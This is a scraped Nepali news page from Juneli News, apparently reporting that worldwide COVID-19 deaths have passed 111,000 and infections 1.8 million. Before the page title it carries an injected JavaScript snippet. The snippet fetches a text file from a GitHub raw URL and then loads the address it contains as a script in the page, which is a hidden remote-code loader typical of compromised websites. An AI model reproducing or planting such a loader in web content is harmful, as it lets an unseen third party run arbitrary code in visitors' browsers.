;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोना संक्रमणबाट मृत्यु हुनेको संख्या १ लाख ११ हजार नाघ्यो, संक्रमित १८ लाख बढी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोरोना संक्रमणबाट मृत्यु हुनेको संख्या १ लाख ११ हजार नाघ्यो, संक्रमित १८ लाख बढी
समाचार

कोरोना संक्रमणबाट मृत्यु हुनेको संख्या १ लाख ११ हजार नाघ्यो, संक्रमित १८ लाख बढी

३० चैत,

काठमाडौं ।   कोरोना नेपाल लाइभका  अनुसार कोरोना भाइरस (कोभिड–१९) संक्रमितको संख्या विश्वभर १८ लाख  ६ हजार नाघेको छ । यस्तै १ लाख ११ हजार ७ सय  सय १८  जनाको मृत्यु भएको छ ।

अमेरिकामा  भने मृत्यु हुनेको संख्या २१ हजार नाघी सकेको छ

फेसबुक प्रतिक्रियाहरु